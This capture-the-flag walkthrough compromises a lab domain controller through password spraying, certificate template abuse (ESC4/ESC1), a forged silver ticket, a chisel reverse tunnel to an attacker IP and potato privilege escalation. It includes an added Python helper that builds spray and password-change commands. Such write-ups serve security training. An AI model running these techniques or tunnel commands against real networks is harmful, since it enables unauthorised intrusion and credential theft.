Enumeration

Nmap

The initial nmap scan showed HTTP and the usual Domain Controller ports open.

00 - nmap

SMB Null Session

SMB share enumeration over a null session was allowed.

01 - smb null

One of the shares contained an incident.txt file. The file explained that some of the user accounts had weak passwords.

02 - incident

Brute Forcing

Because the null session had READ access to the IPC$ share, I could brute-force RIDs through it to build a user list.

04 - rid brute

Then, with the generated user list, I sprayed an empty password against every account.

06 - brute force empty

Two accounts came back with the status PASSWORD MUST CHANGE (the empty password is correct, but the account must change it at next logon), so I set a new password for one of them with impacket's smbpasswd.py.

07 - update password smbpasswd py
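The two steps above (turning rid-brute output into a user list, then picking the accounts worth following up after the empty-password spray) are easy to get wrong by hand, so here is an added example that is not part of the original writeup. The sample netexec output, the domain name LAB, the IP 10.10.11.10 and all account names other than elliot.yates are constructed; the line format is assumed to follow current netexec output. The parser drops groups, aliases and machine accounts (trailing `$`), and the spray parser separates outright successes from accounts that must change their password, which is the case the writeup hit.

```python
import re
import shlex

# Constructed sample of "nxc smb <target> -u '' -p '' --rid-brute" output.
# Format assumed to match netexec; not output captured from the original page.
RID_BRUTE_OUTPUT = r"""
SMB         10.10.11.10     445    DC01             500: LAB\Administrator (SidTypeUser)
SMB         10.10.11.10     445    DC01             501: LAB\Guest (SidTypeUser)
SMB         10.10.11.10     445    DC01             502: LAB\krbtgt (SidTypeUser)
SMB         10.10.11.10     445    DC01             513: LAB\Domain Users (SidTypeGroup)
SMB         10.10.11.10     445    DC01             1000: LAB\DC01$ (SidTypeUser)
SMB         10.10.11.10     445    DC01             1104: LAB\elliot.yates (SidTypeUser)
SMB         10.10.11.10     445    DC01             1105: LAB\svc_backup (SidTypeUser)
SMB         10.10.11.10     445    DC01             1107: LAB\CA Operators (SidTypeAlias)
"""

# Constructed sample of the empty-password spray output (same format assumption).
SPRAY_OUTPUT = r"""
SMB         10.10.11.10     445    DC01             [-] LAB\Administrator: STATUS_LOGON_FAILURE
SMB         10.10.11.10     445    DC01             [+] LAB\Guest:
SMB         10.10.11.10     445    DC01             [-] LAB\krbtgt: STATUS_LOGON_FAILURE
SMB         10.10.11.10     445    DC01             [-] LAB\elliot.yates: STATUS_PASSWORD_MUST_CHANGE
SMB         10.10.11.10     445    DC01             [-] LAB\svc_backup: STATUS_PASSWORD_MUST_CHANGE
"""

RID_LINE = re.compile(r"(\d+):\s+[^\\\s]+\\(.+?)\s+\((SidType\w+)\)")
# [ \t]* rather than \s* so an empty status never swallows the next line.
SPRAY_LINE = re.compile(r"\[([+-])\]\s+[^\\\s]+\\(\S+?):[ \t]*(\S*)")


def parse_rid_brute(text, skip_machine_accounts=True):
    """Return the logon accounts (SidTypeUser) from rid-brute output, in RID order."""
    users = []
    for _rid, name, sid_type in RID_LINE.findall(text):
        if sid_type != "SidTypeUser":
            continue  # groups and aliases cannot be sprayed
        if skip_machine_accounts and name.endswith("$"):
            continue  # machine accounts only add noise to a spray
        if name not in users:
            users.append(name)
    return users


def parse_spray(text):
    """Split spray results into valid logons, must-change accounts and failures."""
    result = {"valid": [], "must_change": [], "failed": []}
    for marker, user, status in SPRAY_LINE.findall(text):
        if marker == "+":
            result["valid"].append(user)
        elif status == "STATUS_PASSWORD_MUST_CHANGE":
            # The password was accepted; the account just needs a new one.
            result["must_change"].append(user)
        else:
            result["failed"].append(user)
    return result


def rid_brute_command(target, max_rid=10000):
    """netexec null-session RID brute force (argv form)."""
    return ["nxc", "smb", target, "-u", "", "-p", "", "--rid-brute", str(max_rid)]


def spray_command(target, userfile):
    """Empty-password spray; --continue-on-success so it does not stop at the first hit."""
    return ["nxc", "smb", target, "-u", userfile, "-p", "", "--continue-on-success"]


def change_password_command(target, domain, user, new_password, old_password=""):
    """impacket smbpasswd.py works for accounts flagged PASSWORD MUST CHANGE."""
    return ["smbpasswd.py", f"{domain}/{user}:{old_password}@{target}", "-newpass", new_password]


if __name__ == "__main__":
    print("#", shlex.join(rid_brute_command("10.10.11.10")))
    print("users:", parse_rid_brute(RID_BRUTE_OUTPUT))
    print("#", shlex.join(spray_command("10.10.11.10", "users.txt")))
    hits = parse_spray(SPRAY_OUTPUT)
    print("must change:", hits["must_change"], "valid:", hits["valid"])
    for user in hits["must_change"]:
        # New password is a constructed placeholder.
        print("#", shlex.join(change_password_command("10.10.11.10", "LAB", user, "Spring2024!")))
```

Write the returned user list to a file one name per line and feed it to the spray command; only the must-change accounts need the smbpasswd.py step, and the old password given to it is the empty one that the spray just confirmed.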

SMB Enumeration

With the new credentials I enumerated the SMB shares again, and this time I could access more of them.

08 - elliot shares

The config share contained the password of the MSSQL service account (sqlsvc). However, the MSSQL port was closed from the outside.

09 - mssql

BloodHound

Next I checked whether the sqlsvc account could bind to LDAP. It could, so I collected the domain data with bloodhound-python.

10 - bloodhound python

BloodHound showed that Elliot.Yates (the user whose password I had changed) can obtain the mgtsvc$ account (the trailing $ marks a machine or gMSA account), and that mgtsvc$ can WinRM to the DC.

11 - mgmtsvc

After the necessary steps I had a WinRM shell on the DC as mgtsvc$.

12 - mgmtsvc

13 - login

Privilege Escalation

1st Way

I ran PrivescCheck (Invoke-PrivescCheck).

14 - PrivescCheck

The output showed that one of the non-standard processes running on the target had hardcoded credentials: a cleartext password for the user clifford.

15 - cleartext clifford

Checking that user in BloodHound showed it was a member of the CA Operators group.

16 - CA Operators

So I ran certipy to check whether any certificate templates were vulnerable.

17 - certipy

One of the templates was vulnerable to ESC4: the group had write access to the template object itself, so its settings could be rewritten.

18 - vulnerable

So I rewrote the template to make it ESC1-exploitable (enrollee supplies the subject), requested a certificate for the Administrator account, and authenticated with it to obtain the Administrator hash.

19 - add ESC1 to template

20 - got the admin hash

Then, with the hash, I used pass-the-hash to get the root flag.

21 - got the root

2nd Way

The C:\ directory contained an SQL2019 directory, so I tried sqlcmd. But there were no useful databases, and CURRENT_USER was guest.

22 - 2nd way checkin sql user

However, I knew the password of the SQL service account. Since the service ticket for MSSQL is encrypted with that account's key, I could forge a silver ticket for Administrator and use it to access the MSSQL service as dbadmin.

First I checked the SPN of the sqlsvc user.

23 - spn

Then I derived the NT hash from the cleartext password (MD4 over the UTF-16LE encoded password) and forged the silver ticket with impacket-ticketer, using that hash, the SPN and the domain SID.

24 - silver ticket

There was still a problem: I could not log in to the service directly because it only listens internally, so I needed port forwarding. I used chisel and applied the steps below:

  1. Update /etc/proxychains4.conf (comment out the default socks4 line and add chisel's reverse SOCKS port):
     #socks4 127.0.0.1 9050
     socks5  127.0.0.1 1080
    
  2. Start the reverse listener on the attacker side:
     chisel server --reverse --port 443
    
  3. Start the client on the victim side:
     chisel.exe client 10.10.16.11:443 R:socks
    
  4. Now the internal network is reachable through proxychains.

So, through proxychains, I used impacket-mssqlclient with the forged ticket to get an interactive SQL shell. Then, with netcat listening, I enabled xp_cmdshell and ran a reverse shell through it.

26 - mssqlclient

I got a shell as the sqlsvc user, which had SeImpersonatePrivilege.

27 - seimpersonate

I used SigmaPotato to abuse SeImpersonatePrivilege and got a SYSTEM shell.

28 - sigma potato

29 - got the system

Pwned

The machine was fully compromised.

PWNED
